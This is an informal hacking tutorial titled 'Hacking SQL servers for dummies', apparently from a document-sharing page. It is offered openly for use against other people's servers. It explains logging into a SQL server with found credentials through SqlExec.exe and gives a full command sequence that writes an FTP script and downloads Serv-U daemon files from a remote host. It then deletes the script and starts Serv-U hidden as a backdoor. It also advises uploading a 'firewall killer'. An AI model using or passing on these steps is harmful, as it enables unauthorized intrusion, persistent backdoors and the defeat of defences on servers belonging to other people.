You are on page 1of 1

Hacking SQL servers for dummies

It's very simple.


Tools: SqlExec.exe (there are diffrent versions around, get one that you like)
Find yourself a ip and the sql login/password.
Paste the IP into SqlExec.exe and press the connect button.
Now you have logged in to the sql, you can now use ordinary dos commands like di
r c:\
I use these command to upload files to the sql:
just type them in one by one.
echo open [ip where the files are] [port] >> C:\ftp.scr
echo user anonymous look@her.azz >> C:\ftp.scr
echo BLANK >> C:\ftp.scr
echo get ServUDaemon.exe >> C:\ftp.scr
echo get TzoLibr.dll >> C:\ftp.scr
echo get ServUDaemon.ini >> C:\ftp.scr
echo QUIT >> C:\ftp.scr
ftp -i -n -v -s:C:\ftp.scr
del C:\ftp.scr
to start servu
c:\winnt\system32\ServUDaemon.exe /h /u
Now you are done, congrats.
If there is a firewall, upload a firewall killer and run it.
Check out http://www.illmob.org/releases.html for some nice progs

You might also like